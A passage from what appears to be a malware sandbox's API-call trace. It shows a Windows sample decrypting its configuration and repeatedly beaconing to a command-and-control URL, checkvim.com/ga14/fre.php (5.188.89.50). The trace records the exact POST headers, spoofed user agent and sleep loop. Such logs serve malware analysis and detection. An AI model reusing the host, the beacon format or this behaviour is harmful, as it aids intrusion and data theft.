ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0260.261] GetProcessHeap () returned 0x840000 [0260.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0260.261] GetProcessHeap () returned 0x840000 [0260.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0260.261] GetProcessHeap () returned 0x840000 [0260.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0260.261] GetProcessHeap () returned 0x840000 [0260.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0260.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.262] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0260.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.267] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0260.274] GetProcessHeap () returned 0x840000 [0260.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0260.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.274] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0260.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.275] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0260.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.276] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.276] GetProcessHeap () returned 0x840000 [0260.276] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0260.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.277] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0260.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.278] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0260.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.279] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0260.279] GetProcessHeap () returned 0x840000 [0260.279] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0260.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.281] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0260.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.282] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0260.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.283] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0260.283] GetProcessHeap () returned 0x840000 [0260.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0260.283] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0260.284] GetProcessHeap () returned 0x840000 [0260.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0260.284] socket (af=2, type=1, protocol=6) returned 0x3b8 [0260.284] connect (s=0x3b8, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0260.352] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0260.352] GetProcessHeap () returned 0x840000 [0260.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0260.352] GetProcessHeap () returned 0x840000 [0260.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0260.353] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0260.354] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0260.354] GetProcessHeap () returned 0x840000 [0260.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0260.354] GetProcessHeap () returned 0x840000 [0260.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0260.354] GetProcessHeap () returned 0x840000 [0260.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0260.354] GetProcessHeap () returned 0x840000 [0260.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0260.355] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0260.355] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0260.355] GetProcessHeap () returned 0x840000 [0260.355] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0260.355] GetProcessHeap () returned 0x840000 [0260.355] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0260.355] send (s=0x3b8, buf=0x873a58*, len=237, flags=0) returned 237 [0260.356] send (s=0x3b8, buf=0x87eb58*, len=159, flags=0) returned 159 [0260.356] GetProcessHeap () returned 0x840000 [0260.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0260.356] recv (in: s=0x3b8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0260.733] GetProcessHeap () returned 0x840000 [0260.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0260.734] GetProcessHeap () returned 0x840000 [0260.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0260.734] GetProcessHeap () returned 0x840000 [0260.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0260.734] GetProcessHeap () returned 0x840000 [0260.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0260.734] closesocket (s=0x3b8) returned 0 [0260.734] GetProcessHeap () returned 0x840000 [0260.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0260.735] GetProcessHeap () returned 0x840000 [0260.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0260.735] GetProcessHeap () returned 0x840000 [0260.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0260.735] GetProcessHeap () returned 0x840000 [0260.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0260.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1048) returned 0x3b8 [0260.736] Sleep (dwMilliseconds=0xea60) [0260.749] GetProcessHeap () returned 0x840000 [0260.749] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0260.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.750] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0260.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.758] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0260.765] GetProcessHeap () returned 0x840000 [0260.765] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0260.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.766] CryptImportKey (in: hProv=0x86fac8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0260.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.767] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0260.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.775] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.775] GetProcessHeap () returned 0x840000 [0260.775] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0260.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.776] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0260.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.777] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0260.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.778] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0260.779] GetProcessHeap () returned 0x840000 [0260.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0260.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.780] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.781] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.782] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.784] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.784] GetProcessHeap () returned 0x840000 [0260.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0260.784] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0260.784] GetProcessHeap () returned 0x840000 [0260.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0260.784] GetProcessHeap () returned 0x840000 [0260.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0260.784] GetProcessHeap () returned 0x840000 [0260.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0260.784] GetProcessHeap () returned 0x840000 [0260.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0260.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.785] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0260.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.794] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0260.804] GetProcessHeap () returned 0x840000 [0260.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0260.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.805] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0260.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.806] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0260.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.808] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.808] GetProcessHeap () returned 0x840000 [0260.808] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0260.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.809] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0260.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.811] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0260.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.812] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0260.812] GetProcessHeap () returned 0x840000 [0260.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0260.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.813] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0260.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.814] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0260.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.815] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0260.816] GetProcessHeap () returned 0x840000 [0260.816] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0260.816] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0260.817] GetProcessHeap () returned 0x840000 [0260.817] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0260.817] socket (af=2, type=1, protocol=6) returned 0x3bc [0260.817] connect (s=0x3bc, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0260.887] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0260.887] GetProcessHeap () returned 0x840000 [0260.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0260.887] GetProcessHeap () returned 0x840000 [0260.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0260.888] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0260.889] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0260.889] GetProcessHeap () returned 0x840000 [0260.889] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0260.889] GetProcessHeap () returned 0x840000 [0260.889] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0260.889] GetProcessHeap () returned 0x840000 [0260.889] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fbd8 [0260.889] GetProcessHeap () returned 0x840000 [0260.889] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0260.890] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0260.890] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0260.890] GetProcessHeap () returned 0x840000 [0260.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0260.891] GetProcessHeap () returned 0x840000 [0260.891] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0260.891] send (s=0x3bc, buf=0x873a58*, len=237, flags=0) returned 237 [0260.891] send (s=0x3bc, buf=0x87eb58*, len=159, flags=0) returned 159 [0260.891] GetProcessHeap () returned 0x840000 [0260.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0260.891] recv (in: s=0x3bc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0261.296] GetProcessHeap () returned 0x840000 [0261.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0261.297] GetProcessHeap () returned 0x840000 [0261.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0261.297] GetProcessHeap () returned 0x840000 [0261.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0261.297] GetProcessHeap () returned 0x840000 [0261.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0261.297] closesocket (s=0x3bc) returned 0 [0261.298] GetProcessHeap () returned 0x840000 [0261.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0261.298] GetProcessHeap () returned 0x840000 [0261.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0261.298] GetProcessHeap () returned 0x840000 [0261.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0261.298] GetProcessHeap () returned 0x840000 [0261.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0261.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1060) returned 0x3bc [0261.306] Sleep (dwMilliseconds=0xea60) [0261.312] GetProcessHeap () returned 0x840000 [0261.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0261.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.314] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0261.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.359] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0261.373] GetProcessHeap () returned 0x840000 [0261.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0261.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.375] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0261.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.377] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0261.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.378] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.378] GetProcessHeap () returned 0x840000 [0261.378] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0261.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.380] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0261.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.381] CryptDestroyKey (hKey=0x87e570) returned 1 [0261.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.382] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0261.382] GetProcessHeap () returned 0x840000 [0261.382] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0261.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.383] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.385] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.387] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.388] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.388] GetProcessHeap () returned 0x840000 [0261.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871538 [0261.388] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0261.389] GetProcessHeap () returned 0x840000 [0261.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871538 | out: hHeap=0x840000) returned 1 [0261.389] GetProcessHeap () returned 0x840000 [0261.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0261.389] GetProcessHeap () returned 0x840000 [0261.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0261.389] GetProcessHeap () returned 0x840000 [0261.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0261.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.390] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0261.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.400] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0261.407] GetProcessHeap () returned 0x840000 [0261.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0261.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.410] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0261.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.412] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, 